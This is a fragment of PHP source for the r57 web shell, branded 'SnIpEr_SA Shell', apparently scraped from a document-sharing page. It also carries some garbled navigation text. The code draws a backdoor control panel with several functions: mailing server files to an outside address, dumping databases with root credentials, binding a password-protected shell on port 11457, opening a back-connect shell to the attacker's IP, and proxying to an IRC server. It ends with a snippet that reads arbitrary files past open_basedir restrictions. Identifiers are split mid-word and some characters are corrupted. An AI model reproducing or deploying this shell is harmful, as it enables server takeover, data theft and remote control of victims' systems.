"; echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_ POST['to'])?($_POST['to']):("[email protected]"))).in('hidden','cmd',0,'mail').in('h idden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty( $_POST['from'])?($_POST['from']):("[email protected]")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty( $_POST['subj'])?($_POST['subj']):("hello billy")))); echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); echo $te."".$fe.$fs."".$ts; echo "".$lang[$language.'_text104']."
"; echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_ POST['to'])?($_POST['to']):("[email protected]"))).in('hidden','cmd',0,'mail_file'). in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty(

$_POST['from'])?($_POST['from']):("[email protected]")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty( $_POST['subj'])?($_POST['subj']):("file from r57shell")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir) ); echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none ',1).' '.$arh); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); echo $te."".$fe."

"; } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = '<select name=db>'; if($mysql_on) $select .= ''; if($mssql_on) $select .= ''; if($pg_on) $select .= ''; if($ora_on) $select .= ''; $select .= ''; echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts ."".$fs."".$ts; echo "".$lang[$language.'_text40']."
"; echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!e mpty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))) ); echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST[' mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password ")))); echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!emp ty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("us er")))); echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$lan guage.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_na me']):("dump.sql")))); echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); echo $te."".$fe.$fs."".$ts; echo "".$lang[$language.'_text83']."
"; echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!e mpty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))) ); echo sr(35,"".$lang[$language.'_text37'].' :

'.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST[' mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password ")))); echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',15,(!emp ty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in( 'hidden','cmd',0,'db_query'),""); echo $te."

".in('submit','submit',0,$lang[$language.'_butt1'])."".$fe."

"; } if(!$safe_mode&&$unix){ echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts ."".$fs."".$ts; echo "".$lang[$language.'_text9']."
"; echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'11457')) ; echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'r57 ')); echo sr(40,"".$lang[$language.'_text20'].$arrow."","<select size=\"1\" name=\"use\">".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); echo $te."".$fe.$fs."".$ts; echo "".$lang[$language.'_text12']."
"; echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('R EMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')) ; echo sr(40,"".$lang[$language.'_text20'].$arrow."","<select size=\"1\" name=\"use\">".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); echo $te."".$fe.$fs."".$ts; echo "".$lang[$language.'_text22']."
"; echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15,'11 457')); echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15,'i rc.dalnet.ru')); echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15,'6 667')); echo sr(40,"".$lang[$language.'_text26'].$arrow."","<select size=\"1\"

name=\"use\">".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); echo $te."".$fe."

"; } echo ''.$table_up3."

o---[ SnIpEr_SA Shell | http://3asfh.net | [email protected] | �� ]--o

".$f; $u1p=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp

echo "

\n"; if(empty($snn)){ if(empty($_GET['snn'])){ if(empty($_POST['snn'])){ die("\nSnIpEr_SA"); } else { $u1p=$_POST['snn']; } } else { $u1p=$_GET['snn']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$snn, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); } else { die(" ".htmlspecialchars($u1p)." ����! ����� ��� ����� �� ��� ���� �������� ������."); } ?>

Nh

Overview

More details

Related Documents

Nh

Nh

Nh

Nh Actsrules

Salspizzama Nh

Nh-xstk